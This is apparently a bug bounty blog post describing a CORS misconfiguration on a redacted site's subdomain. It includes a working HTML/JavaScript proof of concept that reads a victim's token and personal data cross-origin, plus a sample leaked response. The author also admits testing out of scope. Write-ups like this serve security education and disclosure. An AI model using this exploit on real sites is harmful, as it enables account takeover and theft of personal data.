Cors Misconfiguration : Steal victim token and PII leads to ATO

Hello Friends .

today i will talk about a bug i found it on July 2020 on Pvt program on HackerOne. the bug named “Cross Origin Resource Sharing Misconfiguration{CORS}”.

1-firstly what is CORS?

Cross-Origin Resource Sharing(CORS) is a mechanism that enables web browsers to perform cross-domain requests using the XMLHttpRequest API in a controlled manner. These cross-origin requests have an Origin header, that identifies the domain initiating the request. It defines the protocol to use between a web browser and a server to determine whether a cross-origin request is allowed.

2-Summary

After reviewing the Program Scope ,I concluded all subdomains are out of scope , just the main domain are In Scope.

3-Steps To Reproduce

Day one : i started hunting in the main domain www.redact.com, i understand how the program services works , also testing bugs but the site is more secure..

Day two : i back to my testing again , when i viewed the Source code i noticed a subdomain in the code named core-plugins.redact.com
i know out of scope, but my mind tell test it..
the subdomain core-plugins.redact.com do not have a registration page . i can just login with my account on the main domain (SSO)

after login i found this request

he printed PII info on response. Token,email,userinfo…etc
then i noticed the “{Access Control Allow Credentials: true}” so i changed the origin , i deleted core-plugins.redact.com and i added https://evil.com. and it’s work !

Then i edited the graphql request to steal more info .

4-Exploition Code

<!DOCTYPE html>
<html>
<head>
<script>
function cors_exploit() {
var xhttp = new XMLHttpRequest();
xhttp.onreadystatechange = function() {
if (this.readyState == 4 && this.status == 200) {
document.getElementById(“demo”).innerHTML = alert(this.responseText);
}
};

xhttp.open(“GET”, “https://core-plugins.redact.com/graphql?app=web&query=query%20App%20{customer%20{id,...F2}}%20fragment%20F0%20on%20Customer%20{is_premier,is_premier_parent,premier_permissions,username,user_type,full_name,organization_id,customer_id,hostname,token,id}%20fragment%20F1%20on%20Customer%20{premier_permissions,is_premier_parent,id}%20fragment%20F2%20on%20Customer%20{username,full_name,email,is_admin,id,...F0,...F1}", true);
xhttp.withCredentials = true;
xhttp.send();
}
</script>
</head>
<body onload=cors_exploit()>
<center>
<h2>Exploiting CORS Vulnerability </h2>
<h3>Extract SID</h3><div id=cors>
<button type=”button” onclick=cors_exploit()> Exploit</button>
</div>
</body>
</html>

Then i uploaded it to my website www.mysite.com/cors.html and it’s work the Data was printed

{ “data”: { “customer”: { “id”: “u285728853”, “username”: “storedthings133776”, “full_name”: null, “email”: “storedthings1337@gmail.com”, “is_admin”: false, “is_premier”: false, “is_premier_parent”: false, “premier_permissions”: [], “user_type”: “core user”, “organization_id”: null, “customer_id”: “285728853”, “hostname”: “core-plugins.redact.com”, “token”: “1/eyJjbGllbnRfaWQiOiI3YTE*****************” } }, “extensions”: {} }

5-The Token

The attacker could Access to the victim accounts through the token And perform any actions behalf the victim and view other Endpoints in API

Timeline

Nov 19th : Report Sent

Nov 20th: Triaged

Nov 20th: rewarded

— — — — — — — — — — — — — — — — — — — — — — — — — — — — — —

That’s all, thankyou very much for reading it till the last. Hope you would have enjoyed it.

Thanks to @elmrhaseel @ayoubakup @Moroccan-Bugbounty-Hunters

--

--

Get the Medium app

A button that says 'Download on the App Store', and if clicked it will lead you to the iOS App store
A button that says 'Get it on, Google Play', and if clicked it will lead you to the Google Play store